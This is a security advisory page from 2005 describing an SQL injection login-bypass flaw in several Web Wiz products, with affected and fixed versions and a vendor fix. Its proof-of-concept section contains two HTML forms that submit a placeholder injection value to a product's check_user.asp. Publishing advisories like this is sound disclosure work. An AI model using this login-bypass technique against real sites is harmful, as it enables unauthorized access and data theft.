Web Wiz Multiple Products SQL Injection Vulnerability

BID:16085

Info

Web Wiz Multiple Products SQL Injection Vulnerability

Bugtraq ID: 16085
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Dec 30 2005 12:00AM
Updated: Dec 30 2005 12:00AM
Credit: Discovered by DevilBox of KAPDA.
Vulnerable: Webwiz Site News Access 97 3.0 6
Webwiz Site News Access 2000 3.0 6
Webwiz Polls Access 97 3.0 6
Webwiz Polls Access 2000 3.0 6
Webwiz Journal Access 97 1.0
Webwiz Journal Access 2000 1.0
Webwiz Database Login Access 97 1.71
Webwiz Database Login Access 2000 1.71
Not Vulnerable: Webwiz Site News Access 97 3.0 7
Webwiz Site News Access 2000 3.0 7
Webwiz Polls Access 97 3.0 7
Webwiz Polls Access 2000 3.0 7
Webwiz Journal Access 97 1.0 1
Webwiz Journal Access 2000 1.0 1
Webwiz Database Login Access 2000 1.72

Discussion

Web Wiz Multiple Products SQL Injection Vulnerability

Multiple Products by Web Wiz are prone to an SQL injection vulnerability.

Successful exploitation can allow an attacker to bypass authentication and gain unauthorized access to a site.

Attacks may also result in disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

Web Wiz Site News 3.06 for Access 2000 and Access 97, Web Wiz Journal 1.0 for Access 2000 and Access 97, Web Wiz Polls 3.06 for Access 2000 and Access 97, Web Wiz Database Login 1.71 for Access 2000 and Access 97 are vulnerable to this issue. Prior versions are reportedly affected as well.

Exploit / POC

Web Wiz Multiple Products SQL Injection Vulnerability

An exploit is not required.

The following proof of concept example is available:
<html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://www.example.com/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="[SQL INJECTION]">
<input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

Solution / Fix

Web Wiz Multiple Products SQL Injection Vulnerability

Solution:
The vendor has released updated versions to address these issues.


Webwiz Journal Access 97 1.0

Webwiz Journal Access 2000 1.0

Webwiz Database Login Access 2000 1.71

Webwiz Site News Access 97 3.0 6

Webwiz Polls Access 2000 3.0 6

Webwiz Polls Access 97 3.0 6

Webwiz Site News Access 2000 3.0 6

References

Web Wiz Multiple Products SQL Injection Vulnerability

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report